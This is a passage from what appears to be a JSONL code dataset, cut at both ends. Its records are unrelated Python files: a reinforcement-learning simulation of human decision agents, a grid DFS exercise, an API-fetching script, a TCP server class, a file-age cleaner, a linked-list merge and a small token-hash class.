0.5\r\nturn_off_tqdm = False\r\nCONTROL_resting = 99 #Intial duration for CONTROL agent resting\r\nmax_sbj = 82\r\n\r\nRESET = False\r\nSAVE_LOG_Q_VALUE = False\r\nMIXED_RANDOM_MODE = False\r\nRANDOM_MODE_LIST = ['min-rpe', 'max-rpe', 'min-spe', 'max-spe']\r\n\r\n\r\nerror_reward_map = {\r\n # x should be a 4-tuple: rpe, spe, mf_rel, mb_rel\r\n # x should be a 5-tuple: rpe, spe, mf_rel, mb_rel, PMB - updated\r\n 'min-rpe' : (lambda x: x[0] < RPE_LOW_THRESHOLD),\r\n 'max-rpe' : (lambda x: x[0] > RPE_HIGH_THRESHOLD),\r\n 'min-spe' : (lambda x: x[1] < SPE_LOW_THRESHOLD),\r\n 'max-spe' : (lambda x: x[1] > SPE_HIGH_THRESHOLD),\r\n 'min-mf-rel' : (lambda x: x[2] < MF_REL_LOW_THRESHOLD),\r\n 'max-mf-rel' : (lambda x: x[2] > MF_REL_HIGH_THRESHOLD),\r\n 'min-mb-rel' : (lambda x: x[3] < MB_REL_LOW_THRESHOLD),\r\n 'max-mb-rel' : (lambda x: x[3] > MB_REL_HIGH_THRESHOLD),\r\n 'min-rpe-min-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'max-rpe-max-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'min-rpe-max-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'max-rpe-min-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'random' : lambda x: 0\r\n}\r\n\r\n\r\ndef create_lst(x):\r\n return [x] * TRIALS_PER_EPISODE\r\n\r\nstatic_action_map = {\r\n 'min-rpe' : create_lst(0),\r\n 'max-rpe' : 
create_lst(3),\r\n 'min-spe' : create_lst(0),\r\n 'max-spe' : create_lst(1),\r\n 'min-rpe-min-spe' : create_lst(0),\r\n 'max-rpe-max-spe' : create_lst(3),\r\n 'min-rpe-max-spe' : create_lst(1),\r\n 'max-rpe-min-spe' : create_lst(2)\r\n}\r\n\r\ndef error_to_reward(error, PMB=0 , mode=DEFAULT_CONTROL_MODE, bias=CONTROL_REWARD_BIAS):\r\n \"\"\"Compute reward for the task controller. Based on the input scenario (mode), the reward function is determined from the error_reward_map dict.\r\n Args:\r\n error (float list): list with player agent's internal states. Current setting: RPE/SPE/MF-Rel/MB-Rel/PMB\r\n For the error argument, please check the error_reward_map\r\n PMB (float): PMB value of player agents. Currently duplicated with error argument.\r\n mode (string): type of scenario\r\n\r\n Return:\r\n action (int): action to take by human agent\r\n \"\"\"\r\n if TASK_TYPE == 2019:\r\n try:\r\n cmp_func = error_reward_map[mode]\r\n except KeyError:\r\n print(\"Warning: control mode {0} not found, use default mode {1}\".format(mode, DEFAULT_CONTROL_MODE))\r\n cmp_func = error_reward_map[DEFAULT_CONTROL_MODE]\r\n\r\n return cmp_func(error)\r\n elif TASK_TYPE == 2020 or TASK_TYPE == 2021:\r\n if mode == 'min-rpe':\r\n reward = (40 - error[0]) * 3\r\n elif mode == 'max-rpe':\r\n reward = error[0] * 10\r\n elif mode == 'min-spe':\r\n reward = (1 - error[1])*150\r\n elif mode == 'max-spe':\r\n reward = error[1]*200\r\n elif mode == 'min-rpe-min-spe':\r\n reward = ((40 - error[0]) * 3 + (1 - error[1]) * 150 ) /2\r\n elif mode == 'max-rpe-max-spe':\r\n reward = ((error[0]) * 10 + (error[1]) * 100) /2\r\n elif mode == 'min-rpe-max-spe':\r\n reward = ((40 - error[0]) * 3 + (error[1]) * 200) /2\r\n elif mode == 'max-rpe-min-spe':\r\n reward = ((error[0]) * 10 + (1 - error[1]) * 150) /2\r\n elif mode == 'random' :\r\n reward = 0\r\n\r\n if PMB_CONTROL:\r\n reward = reward-60*PMB\r\n\r\n return reward # -60*PMB\r\n# if cmp_func(error):\r\n# if CONTROL_REWARD < 0.5 :\r\n# return CONTROL_REWARD + bias\r\n# else :\r\n# return CONTROL_REWARD * ((2-PMB*2)**0.5) + bias\r\n# #return CONTROL_REWARD*(2-2*PMB) + bias\r\n# else:\r\n# return bias\r\n\r\ndef shuffle_simulation(CONTROL_MODE = 'max-rpe', policy_sbj_indx = 0):\r\n pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n pol = pol_list.index(CONTROL_MODE)\r\n\r\n params = []\r\n f = open('regdata.csv')\r\n data = f.readlines()\r\n for sbj in data:\r\n params.append(sbj.split(',')[:-1])\r\n f.close()\r\n for ii in range(len(params)):\r\n for jj in range(len(params[ii])):\r\n params[ii][jj] = float(params[ii][jj])\r\n\r\n\r\n pol_filename = 'history_results/Analysis-Object-'+CONTROL_MODE+'-{0:02d}'.format(policy_sbj_indx)+file_suffix+'.pkl'\r\n\r\n with open(pol_filename,'rb') as f:\r\n pol_sbj_data = pickle.load(f)\r\n NUM_EPISODES, NUM_FULL_FEATS_DATA = pol_sbj_data.data[pol_list[pol]][0].shape\r\n NUM_FULL_TRIALS, NUM_FULL_FEATS_DETAIL = pol_sbj_data.detail[pol_list[pol]][0].shape\r\n TRIALS_PER_EPISODE = ceil(NUM_FULL_TRIALS / NUM_EPISODES)\r\n PMB_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n RPE_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n SPE_shuffle = np.zeros((max_sbj, TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Reward_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Score_shuffle = np.zeros((max_sbj, TOTAL_EPISODES * TRIALS_PER_EPISODE))\r\n\r\n opt_index = pol_sbj_data.data[pol_list[pol]][0]['ctrl_reward'].loc[\r\n 0.2 * 
len(pol_sbj_data.data[pol_list[pol]][0]):].idxmax()\r\n opt_pol = pol_sbj_data.detail[pol_list[pol]][0]['action'].loc[\r\n opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE:opt_index * TRIALS_PER_EPISODE - 1]\r\n\r\n\r\n for affected_sbj_indx in range(max_sbj):\r\n env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n # initialize human agent one time\r\n sarsa = SARSA(env.action_space[MDP.HUMAN_AGENT_INDEX], env, learning_rate=params[affected_sbj_indx][5]) # SARSA model-free learner\r\n forward = FORWARD(env.observation_space[MDP.HUMAN_AGENT_INDEX],\r\n env.action_space[MDP.HUMAN_AGENT_INDEX],\r\n env.state_reward_func, env.output_states_offset, env.reward_map_func,\r\n learning_rate=params[affected_sbj_indx][5], disable_cforward=True) # forward model-based learner\r\n arb = Arbitrator(AssocRelEstimator(params[affected_sbj_indx][1], env.max_rpe),\r\n BayesRelEstimator(thereshold=params[affected_sbj_indx][0]),\r\n amp_mb_to_mf=params[affected_sbj_indx][2], amp_mf_to_mb=params[affected_sbj_indx][3], temperature=params[affected_sbj_indx][4], MB_ONLY = MB_ONLY, MF_ONLY= MF_ONLY)\r\n # register in the communication controller\r\n env.agent_comm_controller.register('model-based', forward)\r\n for episode in tqdm(range(TOTAL_EPISODES)):\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n sarsa = sarsa_save\r\n forward = forward_save\r\n arb = arb_save\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n cum_d_p_mb = cum_p_mb = cum_mf_rel = cum_mb_rel = cum_rpe = cum_spe = cum_reward = cum_score = 0\r\n cum_ctrl_act = np.zeros(MDP.NUM_CONTROL_ACTION)\r\n arb.episode_number = episode\r\n arb.CONTROL_resting = CONTROL_resting\r\n human_action_list_episode = []\r\n# env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n# env.agent_comm_controller.register('model-based', forward)\r\n for trial in range(TRIALS_PER_EPISODE):\r\n block_indx = trial // int(TRIALS_PER_EPISODE / 4)\r\n if trial % TRIALS_PER_EPISODE == 0:\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n if episode <= CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.bwd_idf = -1\r\n t_d_p_mb = t_p_mb = t_mf_rel = t_mb_rel = t_rpe = t_spe = t_reward = t_score = 0\r\n game_terminate = False\r\n human_obs, control_obs_frag = env.reset()\r\n #control_obs = np.append(control_obs_frag, [10, 0.5])\r\n if episode > CONTROL_resting:\r\n \"\"\"control agent choose action\"\"\"\r\n control_action = int(opt_pol[opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE+ trial])\r\n else:\r\n control_action = 0\r\n cum_ctrl_act[control_action] += 1\r\n \"\"\"control act on environment\"\"\"\r\n if TASK_TYPE == 2019:\r\n if control_action == 3:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n elif TASK_TYPE == 2021:\r\n if control_action == 2:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n _, _, _, _ = env.step([MDP.CONTROL_AGENT_INDEX, control_action])\r\n\r\n current_game_step = 0\r\n\r\n while not game_terminate:\r\n 
\"\"\"human choose action\"\"\"\r\n if episode < CONTROL_resting:\r\n human_action = randint(0, 1)\r\n else:\r\n human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(human_obs))\r\n #print(\"human action : \", human_action)\r\n\r\n \"\"\"human act on environment\"\"\"\r\n next_human_obs, human_reward, game_terminate, next_control_obs_frag \\\r\n = env.step((MDP.HUMAN_AGENT_INDEX, human_action))\r\n\r\n \"\"\"update human agent\"\"\"\r\n spe = forward.optimize(human_obs, human_reward, human_action, next_human_obs, env)\r\n next_human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(next_human_obs)) # required by models like SARSA\r\n if env.is_flexible == 1: #flexible goal condition\r\n rpe = sarsa.optimize(human_reward, human_action, next_human_action, human_obs, next_human_obs)\r\n else: # specific goal condition human_reward should be normalized to sarsa\r\n if human_reward > 0: # if reward is 10, 20, 40\r\n rpe = sarsa.optimize(40, human_action, next_human_action, human_obs, next_human_obs)\r\n else:\r\n rpe = sarsa.optimize(0, human_action, next_human_action, human_obs, next_human_obs)\r\n\r\n mf_rel, mb_rel, p_mb, d_p_mb = arb.add_pe(rpe, spe)\r\n t_d_p_mb += d_p_mb\r\n t_p_mb += p_mb\r\n t_mf_rel += mf_rel\r\n t_mb_rel += mb_rel\r\n t_rpe += abs(rpe)\r\n t_spe += spe\r\n t_score += human_reward # if not the terminal state, human_reward is 0, so simply add here is fine\r\n\r\n \"\"\"iterators update\"\"\"\r\n human_obs = next_human_obs\r\n if current_game_step == 0:\r\n rpe1 = rpe\r\n else:\r\n rpe2 = rpe\r\n current_game_step += 1\r\n\r\n # calculation after one trial\r\n d_p_mb, p_mb, mf_rel, mb_rel, rpe, spe = list(map(lambda x: x / 2, [\r\n t_d_p_mb, t_p_mb, t_mf_rel, t_mb_rel, t_rpe, t_spe])) # map to average value\r\n cum_d_p_mb += d_p_mb\r\n cum_p_mb += p_mb\r\n cum_mf_rel += mf_rel\r\n cum_mb_rel += mb_rel\r\n cum_rpe += rpe\r\n cum_spe += spe\r\n cum_score += t_score\r\n\r\n \"\"\"update control agent\"\"\"\r\n t_reward = error_to_reward((rpe, spe, mf_rel, mb_rel), p_mb, CONTROL_MODE)\r\n cum_reward += t_reward\r\n #next_control_obs = np.append(next_control_obs_frag, [rpe, spe])\r\n\r\n #control_obs_extra = [rpe, spe]\r\n PMB_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=p_mb\r\n RPE_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=rpe\r\n SPE_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = spe\r\n Reward_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_reward\r\n Score_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_score\r\n\r\n\r\n if episode == CONTROL_resting - 1:\r\n arb_save = arb\r\n sarsa_save = sarsa\r\n forward_save = forward\r\n\r\n save_pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n save_file_head = 'history_results/SUB{0:03d}_SHUFFLE_'.format(policy_sbj_indx) + save_pol_list[pol_list.index(CONTROL_MODE)]+file_suffix\r\n np.save(save_file_head+'_PMB.npy',PMB_shuffle)\r\n np.save(save_file_head+'_RPE.npy',RPE_shuffle)\r\n np.save(save_file_head + '_SPE.npy', SPE_shuffle)\r\n np.save(save_file_head+'_RWD.npy',Reward_shuffle)\r\n np.save(save_file_head + '_SCR.npy', Score_shuffle)\r\n\r\n\r\nif __name__ == '__main__':\r\n short_opt = \"hdn:\"\r\n long_opt = [\"policy-sbj=\",\"ctrl-mode=\",\"task-type=\",'file-suffix=']\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], short_opt, long_opt)\r\n except getopt.GetoptError as err:\r\n print(err)\r\n 
sys.exit(2)\r\n    for o, a in opts:\r\n        if o == \"--policy-sbj\":\r\n            policy_sbj_indx = int(a)\r\n        elif o == \"--ctrl-mode\":\r\n            CONTROL_MODE = a\r\n        elif o == \"--task-type\":\r\n            TASK_TYPE = int(a)\r\n        elif o == \"--file-suffix\":\r\n            file_suffix = a\r\n            print(file_suffix)\r\n        # note: getopt only accepts options registered in long_opt above\r\n        elif o == \"--MF_ONLY\":\r\n            MF_ONLY = bool(a)\r\n        elif o == \"--MB_ONLY\":\r\n            MB_ONLY = bool(a)\r\n        else:\r\n            assert False, \"unhandled option\"\r\n\r\n    shuffle_simulation(CONTROL_MODE = CONTROL_MODE, policy_sbj_indx = policy_sbj_indx)\r\n","sub_path":"shuffle_simulation.py","file_name":"shuffle_simulation.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"561439716","text":"import sys\nsys.stdin=open('danG.txt', 'r')\n\n\ndef dfs(a, b):\n global cnt, num, rocol\n base[a][b] = cnt\n num += 1\n for dir in range(4):\n aa = a+dy[dir]\n bb = b+dx[dir]\n if -1 < aa < rocol and -1 < bb < rocol:\n if base[aa][bb] == 1:\n dfs(aa, bb)\n\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\nrocol = int(input())\nbase = [0]*rocol\ncnt = 1\nnum = 0\nnum_list = []\nfor i in range(rocol):\n base[i] = list(map(int, input()))\nfor ii in range(rocol):\n for jj in range(rocol):\n if base[ii][jj] == 1:\n cnt += 1\n dfs(ii, jj)\n num_list.append(num)\n num = 0\nprint(cnt-1)\nnum_list.sort()\nfor nn in range(len(num_list)):\n print(num_list[nn])","sub_path":"algorithm_practice/s2s3_ad_study/dfsbfs/2667_danG.py","file_name":"2667_danG.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"392503240","text":"#!/usr/bin/python3\n\"\"\"task 0\"\"\"\nimport requests\nimport sys\nif __name__ == '__main__':\n if len(sys.argv) == 2 and sys.argv[1].isdigit():\n arg = sys.argv[1]\n res1 = requests.get('https://jsonplaceholder.typicode.com/todos')\n res2 = requests.get('https://jsonplaceholder.typicode.com/users')\n s = res1.json()\n usr = res2.json()\n for y in usr:\n if y['id'] == int(arg):\n user = y['name']\n Max = 0\n Done = 0\n titles = []\n for i in s:\n for key, value in i.items():\n if key == 'userId' and value == int(arg):\n Max += 1\n for key, value in i.items():\n if key == 'completed' and value is True:\n Done += 1\n titles.append(i['title'])\n print('Employee {} is done with tasks({}/{}):'.format(user, Done, Max))\n for i in titles:\n print('\\t {}'.format(i))\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"484958553","text":"import time\nimport socket\nimport threading\nimport selectors\nfrom ANETTEST.AutoNET.Socket._Tool import get_my_ip, get_socket_buffer_size\nfrom ANETTEST.AutoNET.Socket._decode import cut_message_by_head, get_data_len, decode_message\nfrom ANETTEST.AutoNET.Socket._decode import LEN_TOTAL, build_tx_message\n\n\nclass TcpServer(object):\n\n def __init__(self, recv_cb, event_cb, error_cb, port, rx_length=256, launch_delay=0):\n # CALLBACK\n self._recv_cb = recv_cb\n self._event_cb = event_cb\n self._error_cb = error_cb\n # TCP\n self._select = None\n self._tcp = None\n self._is_bound = False\n self._port = port\n self._clients = dict() # {socket_conn: '10.10.10.10'}\n self._rx_length = rx_length\n self._rx_buffer = bytes()\n # Thread\n self._thread = threading.Thread(target=self._working)\n self._thread_interval = 2\n self._thread.daemon = True\n self._thread_delay = launch_delay\n self._thread.start()\n\n def _working(self):\n time.sleep(self._thread_delay)\n self._tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) # SO_REUSEADDR, SO_REUSEPORT\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, get_socket_buffer_size())\n self._tcp.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, get_socket_buffer_size())\n self._select = selectors.DefaultSelector()\n self._select.register(self._tcp, selectors.EVENT_READ, self._accept)\n while 1:\n if self._is_bound:\n events = self._select.select(timeout=self._thread_interval)\n for key, mask in events:\n callback = key.data\n callback(key.fileobj)\n else:\n host_ip = self.get_my_ip()\n if host_ip:\n try:\n self._tcp.bind((host_ip, self._port))\n self._tcp.listen()\n self._is_bound = True\n except socket.error as err:\n self._error_cb(module='ANET_TCP', code='BIND', value=err)\n time.sleep(self._thread_interval)\n self._event_cb(module='ANET_TCP', code='BIND', value=(self._is_bound, (host_ip, self._port)))\n else:\n print('[ERROR] ANET_SERVER: Network is unreachable')\n\n def _recv_length(self, conn, rx_length):\n rx_msg = bytes()\n try:\n msg = conn.recv(rx_length)\n if msg:\n rx_msg += msg\n else:\n self._client_lost(conn=conn)\n except (BlockingIOError, socket.timeout, OSError) as err:\n print(' BlockingIOError', err)\n except (ConnectionResetError, ConnectionAbortedError) as err:\n print(' ConnectionResetError', err)\n self._client_lost(conn=conn)\n return rx_msg\n\n def _recv(self, conn):\n # RX ONE MESSAGE\n self._rx_buffer += self._recv_length(conn=conn, rx_length=self._rx_length)\n while self._rx_buffer:\n # CUT_TO_HEAD\n msg_with_head = cut_message_by_head(buffer=self._rx_buffer)\n if not msg_with_head:\n break\n # GET_DATA_LEN\n data_len, miss_len = get_data_len(msg_with_head=msg_with_head)\n if miss_len > 0: # MISS_DATA\n new_buffer = self._recv_length(conn=conn, rx_length=miss_len)\n if new_buffer:\n self._rx_buffer += new_buffer\n else:\n break\n else: # PARSE_DATA\n data, self._rx_buffer, error = decode_message(msg_with_head=msg_with_head, data_len=data_len)\n if data:\n self._recv_cb(rx_msg=data, ip=self._clients[conn])\n if error:\n self._error_cb(module='ANET_TCP', code=error, value=self._rx_buffer)\n\n def _conn_send(self, conn, data: bytes):\n bytes_sent = 0\n try:\n msg, msg_len = build_tx_message(data=data)\n bytes_sent = conn.send(msg)\n if bytes_sent != msg_len:\n print('[ERROR], TCP_TX', f'{bytes_sent}/{len(msg)}', msg)\n self._error_cb(module='ANET_TCP', code='TX_BUF_OVERFLOW', value=msg)\n bytes_sent -= LEN_TOTAL\n except 
(BlockingIOError, socket.timeout, OSError) as err:\n            pass\n        except (ConnectionResetError, ConnectionAbortedError) as err:\n            self._error_cb(module='ANET_TCP', code='SEND', value=err)\n            self._client_lost(conn)\n        return bytes_sent\n\n    # SEND\n    def send_to(self, data, ip):\n        bytes_sent = 0\n        if ip in self._clients.values():\n            conn = list(self._clients.keys())[list(self._clients.values()).index(ip)]\n            bytes_sent = self._conn_send(conn, data)\n        return bytes_sent\n\n    def send_broadcast(self, data):\n        arrived_clients_ip = list()\n        if self._clients:\n            for conn in list(self._clients.keys()):\n                bytes_sent = self._conn_send(conn, data)\n                if bytes_sent:\n                    arrived_clients_ip.append(self._clients[conn])\n        return arrived_clients_ip\n\n    # ACCEPT / LOST\n    def _accept(self, sock):\n        conn, addr = sock.accept()\n        ip, port = addr\n        self._clients[conn] = ip\n        self._select.register(conn, selectors.EVENT_READ, self._recv)\n        self._event_cb(module='ANET_TCP', code='CONNECT', value=(True, (ip, self._port)))\n\n    def _client_lost(self, conn):\n        if conn in self._select.get_map():\n            self._select.unregister(conn)\n        if conn in self._clients:\n            ip = self._clients[conn]\n            conn.close()\n            self._clients.pop(conn)\n            self._event_cb(module='ANET_TCP', code='CONNECT', value=(False, (ip, self._port)))\n\n    # FUNC\n    def is_bound(self):\n        return self._is_bound\n\n    def get_client_ips(self):\n        return list(self._clients.values())\n\n    def is_connected(self):\n        return True if list(self._clients.values()) else False\n\n    def disconnect_all(self):\n        for conn in list(self._clients.keys()):\n            self._client_lost(conn=conn)\n\n    @staticmethod\n    def get_my_ip():\n        return get_my_ip()\n\n    def get_server_port(self):\n        return self._port\n\n    def exit(self):\n        self._tcp.close()\n\n\nif __name__ == '__main__':\n\n    def recv_cb_(rx_msg, ip):\n        print(f'TCP_RX: {rx_msg} ({ip})')\n\n    def event_cb_(module, code, value):\n        print(f'EVENT_RX: {module} {code} {value}')\n\n    def error_cb_(module, code, value):\n        print(f'ERROR: {module} {code} {value}')\n\n    SER_PORT = 10001\n\n    server = TcpServer(recv_cb_, event_cb_, error_cb_, port=SER_PORT)\n    print('MY_IP=', server.get_my_ip())\n    while 1:\n        time.sleep(2)\n        server.send_broadcast(b'message from server')\n","sub_path":"ANETTEST/AutoNET/Socket/TcpServer.py","file_name":"TcpServer.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
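+# --- Illustrative aside, not part of the dataset record above: TcpServer is built on
+# the standard-library `selectors` readiness loop (register the listener with an
+# accept callback, register each accepted connection with a read callback, then
+# dispatch key.data(key.fileobj)). A minimal self-contained echo-server sketch of
+# that same pattern; the port number here is hypothetical:
+import selectors
+import socket
+
+sel = selectors.DefaultSelector()
+
+def accept(sock):
+    conn, addr = sock.accept()                      # new client connection
+    conn.setblocking(False)
+    sel.register(conn, selectors.EVENT_READ, read)
+
+def read(conn):
+    data = conn.recv(1024)
+    if data:
+        conn.send(data)                             # echo the bytes back
+    else:
+        sel.unregister(conn)                        # client closed the socket
+        conn.close()
+
+listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+listener.bind(('localhost', 10001))
+listener.listen()
+listener.setblocking(False)
+sel.register(listener, selectors.EVENT_READ, accept)
+
+while True:
+    for key, mask in sel.select(timeout=2):
+        key.data(key.fileobj)                       # dispatch to accept/read
+# --- end of aside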
+{"seq_id":"230589731","text":"from threading import Timer, Thread\nfrom functools import partial\nfrom os import remove, path, stat, walk\nfrom platform import system\nfrom time import time\n\n\ndef get_file_creation_date(filepath: str) -> str:\n if system() == \"Windows\":\n return path.getctime(filepath)\n else:\n meta = stat(filepath)\n try:\n return meta.st_birthtime\n except AttributeError:\n return meta.st_mtime\n\n\ndef get_all_files_in_dir(dir: str) -> list:\n filepaths = []\n\n for pack in walk(dir):\n for f in pack[2]:\n filepaths.append(f)\n\n return filepaths\n\n\ndef del_old_files_in_dir(path: str, age: int = 0):\n def _del_old_files_in_dir(path: str, age: int = 0):\n filepaths = get_all_files_in_dir()\n\n for filepath in filepaths:\n crt_time = get_file_creation_date(filepath)\n if time() - crt_time > age:\n Thread(target=remove, args=[filepath]).start()\n\n Thread(target=_del_old_files_in_dir, args=[path, age]).start()\n\n\ndef del_old_files_in_dir_periodic(interval: int, path: str, age: int = 0):\n Timer(interval, partial(del_old_files_in_dir, age, path)).start()\n","sub_path":"wb/utils/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"325257381","text":"# 3.6 Установка дополнительных модулей\n\n\"\"\"\nИмеется набор файлов, каждый из которых, кроме последнего, содержит имя следующего файла.\nПервое слово в тексте последнего файла: \"We\".\n\nСкачайте предложенный файл. В нём содержится ссылка на первый файл из этого набора.\n\nВсе файлы располагаются в каталоге по адресу:\nhttps://stepic.org/media/attachments/course67/3.6.3/\n\nЗагрузите содержимое последнего файла из набора, как ответ на это задание.\n\"\"\"\n\nimport requests\n\nurl = 'https://stepic.org/media/attachments/course67/3.6.3/699991.txt'\nwhile True:\n r = requests.get(url)\n t = r.text.split()\n if t[0] == 'We':\n with open('D:\\Python\\dataset_3378_result.txt', 'w', encoding='utf-8') as inf:\n inf.write(r.text)\n break\n else:\n url = 'https://stepic.org/media/attachments/course67/3.6.3/' + r.text","sub_path":"3/3.6.3.py","file_name":"3.6.3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"78596048","text":"'''\n\n'''\n\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\ndef mergeTwoLists_iteratively(l1,l2):\n dummy = cur = ListNode(0)\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1=l1.next\n else:\n cur.next = l2\n l2=l2.next\n cur = cur.next\n cur.next = l1 or l2\n return dummy.next\n\ndef mergeTwoLists_recursively(l1, l2):\n if not l1 or not l2:\n return l1 or l2\n if l1.val< l2.val:\n print(l1.val,\" is less than \",l2.val)\n l1.next = mergeTwoLists_recursively(l1.next,l2)\n print(\"Move \",l1.val,\" to smaller between \",l1.next.val,l2.val)\n return l1\n else:\n print(l2.val,\" is less than \",l1.val)\n l2.next = mergeTwoLists_recursively(l1,l2.next)\n print(\"Move \",l2.val,\" to smaller between \",l1.val,l2.next.val)\n return l2\n\nl1 = ListNode(3,ListNode(5,ListNode(6)))\nl2 = ListNode(1,ListNode(2, ListNode(4, ListNode(7))))\nh = mergeTwoLists_iteratively(l1,l2)\nwhile h:\n print(h.val)\n h = h.next","sub_path":"GoogleTopQues/21_mergeTwoLists.py","file_name":"21_mergeTwoLists.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"454604217","text":"class Edge:\n \"\"\"\n An edge which records two centers and two adjacent corners\n \"\"\"\n def __init__(self, id, center1, center2, vertex1, vertex2, is_border):\n self.id = id\n self.d0 = center1\n self.d1 = center2\n self.v0 = vertex1\n self.v1 = vertex2\n self.is_border = is_border\n","sub_path":"cartograph/border_graph/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"83948217","text":"#! /usr/bin/env python3\n\nimport functions # this imports all functions in the file functions\n\t\t\t\t # you can import this as another name if the name of the module is large or too long.\n\t\t\t\t # e.g import functions as f\n\nfrom functions_2 import preety_Print # This imports the preety_Print function only\n\t\t\t\t\t\t\t\t\t # You can also import function as\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import preety_print as p_p\n\t\t\t\t\t\t\t\t\t # you can import all functions with *\n\t\t\t\t\t\t\t\t\t # e.g from functions_2 import *\n\n\nthree_hundred = functions.add(1, 299)\nprint(three_hundred)\n\nd = {\n\t'first_name' : 'Eric',\n\t'last_name' : 'Mwamodo',\n\t'age' : 23,\n\t'location' : 'Wundanyi'\n}\n\npreety_Print(d)\n","sub_path":"Basics/10-07-2016/imports__.py","file_name":"imports__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"446597119","text":"from flask import make_response, request, session\nfrom datetime import date, datetime, timedelta\nfrom .db import db\nimport time\nimport random\nimport string\n\nclass security :\n def __init__(self):\n self.table = 'security'\n self.valid_duration = 60 * 10\n\n def get_hash(self) :\n obj_database = db()\n security_hash = self.hash_generator()\n query = ('INSERT INTO ' + self.table + ' (security_hash, security_time, security_used) VALUES (%s, %s, %s)')\n data = (security_hash, time.strftime('%Y-%m-%d %H:%M:%S'), 0)\n\n if obj_database.insert(query, data) != False :\n return security_hash\n else :\n return False\n\n def check_hash(self, hash='') :\n obj_database = db()\n query = ('SELECT * FROM ' + self.table + ' WHERE security_hash=%s AND security_used!=%s')\n data = (hash, 1, )\n security_records = obj_database.select(query, data)\n\n if len(security_records) > 0 :\n if int(datetime.now().timestamp()) - int(datetime.timestamp(security_records[0]['security_time'])) < self.valid_duration :\n query = ('UPDATE ' + self.table + ' SET security_used=%s WHERE security_hash=%s')\n data = (1, hash)\n obj_database.update(query, data)\n\n return True\n else :\n return False\n else :\n return False\n\n def hash_generator(self) :\n letters = string.ascii_lowercase + '1234567890'\n return 